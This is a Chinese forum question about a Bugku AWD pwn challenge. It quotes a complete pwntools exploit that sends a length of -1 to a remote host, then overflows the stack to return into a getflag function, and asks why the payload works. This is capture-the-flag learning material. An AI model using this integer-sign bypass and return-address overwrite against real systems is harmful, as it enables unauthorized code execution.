sweety 发表于 2021-9-12 10:16:42

pwn题f4n_pwn的payload求解惑

本帖最后由 sweety 于 2021-9-12 19:09 编辑

最近打bugku的awd,pwn机上的题目,原题已贴

在main函数跟进read_name函数,里面有两个洞,源程序含有getflag的函数

这个栈溢出,我先用cyclic计算偏移,发现报错,后用pattern.py计算出是107,但是都拿不到flag
遂上网找wp,但还是看不懂payload...
exp
from pwn import *

p = remote("114.116.54.89",10011)


p.recvuntil("input your name length : \n")
p.sendline("-1")

payload = 'a'*(0x60-0xc) + 'c' + p32(0x080486BB)

p.recvuntil("please tell me your name : \n")
p.sendline(payload)
p.interactive()


这里控制i的值实在是想不通,而且这条payload的偏移是87
原题:
链接:https://pan.baidu.com/s/1cXbluxV4MHTngEr1pcrtkw
提取码:9wo0




sweety 发表于 2021-9-12 19:48:58

本帖最后由 sweety 于 2021-10-20 15:58 编辑

已解决
页: [1]
查看完整版本: pwn题f4n_pwn的payload求解惑